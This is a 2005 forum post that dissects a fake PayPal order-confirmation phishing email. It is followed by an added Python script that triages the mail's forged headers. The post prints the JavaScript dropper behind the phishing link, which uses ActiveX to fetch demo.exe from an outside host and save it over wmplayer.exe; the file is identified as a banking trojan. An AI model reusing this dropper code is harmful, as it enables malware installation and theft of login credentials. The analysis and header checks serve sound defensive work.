Extreme
05-02-05, 20:35
Hello everyone:
Message:
From - Sun Jan 30 14:55:22 2005
X-Account-Key: account2
X-UIDL: LJ~!!jG-!!G2e"!8Tc!!
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <piteshman@shop.com>
Delivered-To: *********@dd2004.kasserver.com
Received: from UserMail1.FreeCity.De (usermail1.freecity.de [81.88.35.51])
by dd2004.kasserver.com (Postfix) with ESMTP id 13CE49D763
for <Info@x-nomine.de>; Sat, 29 Jan 2005 22:18:18 +0100 (CET)
Received: from 194.42.24.10 (pi10.pi.ac.cy [194.42.24.10])
by UserMail1.FreeCity.De (Postfix) with SMTP id B21041A0058EE
for <info@web-breaker.de>; Sat, 29 Jan 2005 22:19:46 +0100 (CET)
X-Message-Info: V/km+3+td/F+42/444321127952331
Received: from smtp-credenza.areaway.piteshman@shop.com ([]) by g270-wvi9.piteshman@shop.com with Microsoft SMTPSVC(5.0.5203.4611);
Sun, 30 Jan 2005 02:52:19 -0500
Received: from smtp-pensive.florid.piteshman@shop.com ([]) by bv57-cg32.piteshman@shop.com with Microsoft SMTPSVC(5.0.2333.6235);
Sun, 30 Jan 2005 11:53:19 +0400
X-Message-Info: NCDZ+%ND_LC_CHAR[1-3]7+ie+NDW+482/198368156710
Received: (qmail 41314 invoked by uid 830); Sun, 30 Jan 2005 01:46:19 -0600
Date: Sun, 30 Jan 2005 00:52:19 -0700
Message-Id: <0669230252.31056@piteshman@shop.com>
From: PayPal Support <piteshman@shop.com>
To: Info <info@web-breaker.de>
Subject: Sony DSC-F828 8.0MP Digital Camera
MIME-Version: 1.0 (produced by francesanew 7.4)
Content-Type: multipart/alternative;
boundary="--206346472488856940"
X-UIDL: LJ~!!jG-!!G2e"!8Tc!!
----206346472488856940
Content-Type: text/html;
charset="iso-5877-2"
Content-Transfer-Encoding: 7Bit
Content-Description: cicada avocet alkaloid
Sony DSC-F828 8.0MP Digital Camera<br><br>
Your order # 12405 has been accepted for the amount 840.00$ <br>
Your card will be charged in that amount .Thank you for your purchase.<br><br><br>
You can check the order in your profile. <br><br>
<a href="http://jeysiksnet.net">http://jeysiksnet.net</a>;
----206346472488856940--
When the link is followed, an iframe is loaded which, on redirect to a page, opens javascript_loader.js.
This in turn opens shellcode.js. Code:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://jeysiksnet.netfirms.com/demo.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
I analysed demo.exe:
TrojanSpy.Win32.Banker.bq
Presumably it logs the PayPal login credentials and sends them home.
Regards
Extreme
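Added here as a worked example, not part of Extreme's post: a Python script that applies the header checks a mail admin would run against this message. The sample headers are a constructed copy of the ones quoted above, trimmed to the fields the checks use. It flags the display name claiming PayPal while the address sits at shop.com, the two Received lines with an empty IP literal "([])" that no real MTA would write, the oldest hop that actually carries an IP (194.42.24.10, the point where the mail entered FreeCity's server), the charset label iso-5877-2 that no codec table knows, and a Date header stamped more than ten hours after the receiving server's own timestamp.

```python
"""Header triage for the phishing mail quoted above (added example)."""
import codecs
import email
import re
from email.utils import parseaddr, parsedate_to_datetime

# Constructed sample: the header block of the quoted mail, trimmed to the fields
# the checks below use; the HTML body is omitted.
SAMPLE = """Return-Path: <piteshman@shop.com>
Received: from UserMail1.FreeCity.De (usermail1.freecity.de [81.88.35.51])
\tby dd2004.kasserver.com (Postfix) with ESMTP id 13CE49D763
\tfor <Info@x-nomine.de>; Sat, 29 Jan 2005 22:18:18 +0100 (CET)
Received: from 194.42.24.10 (pi10.pi.ac.cy [194.42.24.10])
\tby UserMail1.FreeCity.De (Postfix) with SMTP id B21041A0058EE
\tfor <info@web-breaker.de>; Sat, 29 Jan 2005 22:19:46 +0100 (CET)
Received: from smtp-credenza.areaway.piteshman@shop.com ([]) by g270-wvi9.piteshman@shop.com with Microsoft SMTPSVC(5.0.5203.4611);
\tSun, 30 Jan 2005 02:52:19 -0500
Received: from smtp-pensive.florid.piteshman@shop.com ([]) by bv57-cg32.piteshman@shop.com with Microsoft SMTPSVC(5.0.2333.6235);
\tSun, 30 Jan 2005 11:53:19 +0400
Date: Sun, 30 Jan 2005 00:52:19 -0700
From: PayPal Support <piteshman@shop.com>
To: Info <info@web-breaker.de>
Subject: Sony DSC-F828 8.0MP Digital Camera
Content-Type: text/html; charset="iso-5877-2"

(body omitted)
"""

HOP_RE = re.compile(r"from\s+(\S+)\s+\(([^)]*)\)\s+by\s+(\S+)")
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_hops(msg):
    """Received lines, newest first, as dicts with from/comment/by/stamp."""
    hops = []
    for raw in msg.get_all("Received", []):
        value = " ".join(raw.split())  # unfold continuation lines
        m = HOP_RE.search(value)
        if not m:
            continue
        stamp = value.rsplit(";", 1)[1].strip() if ";" in value else ""
        hops.append({"from": m.group(1), "comment": m.group(2),
                     "by": m.group(3), "stamp": stamp})
    return hops


def forged_hops(hops):
    """Hops no real MTA would write: empty IP literal or '@' inside a host name."""
    return [h for h in hops
            if h["comment"].strip("[] ") == "" or "@" in h["from"] or "@" in h["by"]]


def entry_point(hops):
    """Oldest hop with a genuine IP literal: where the mail entered the receiving
    side. Every Received line below it was supplied by the sender."""
    for h in reversed(hops):
        m = IP_RE.search(h["comment"])
        if m:
            return m.group(1), h["comment"].split("[")[0].strip()
    return None


def brand_mismatch(msg):
    """Display name carries words that do not appear in the sending domain."""
    name, addr = parseaddr(msg["From"])
    domain = addr.rpartition("@")[2].lower()
    words = [w.lower() for w in re.findall(r"[A-Za-z]{4,}", name)]
    if words and not any(w in domain for w in words):
        return name, domain
    return None


def unknown_charset(msg):
    """Charset label Python cannot resolve (mail clients tend to fall back silently)."""
    cs = msg.get_content_charset()
    if cs is None:
        return None
    try:
        codecs.lookup(cs)
    except LookupError:
        return cs
    return None


def date_skew_seconds(msg, hops):
    """How far the sender's Date header lies after our own server's first stamp."""
    sent = parsedate_to_datetime(msg["Date"])
    landed = parsedate_to_datetime(hops[0]["stamp"])
    return int((sent - landed).total_seconds())


def triage(raw):
    """Run all checks on a raw RFC 822 message and collect the findings."""
    msg = email.message_from_string(raw)
    hops = parse_hops(msg)
    return {
        "brand_mismatch": brand_mismatch(msg),
        "forged_hops": forged_hops(hops),
        "entry_point": entry_point(hops),
        "unknown_charset": unknown_charset(msg),
        "date_skew_seconds": date_skew_seconds(msg, hops),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The Received chain has to be read bottom-up: the topmost line was written by the recipient's own server and is the only one that can be trusted outright; the two lines at the bottom, with their empty IP brackets and "@" inside the host names, were already in the message when it arrived at FreeCity's relay from 194.42.24.10, so that address is the real origin, not the Microsoft SMTPSVC hosts the headers pretend to be.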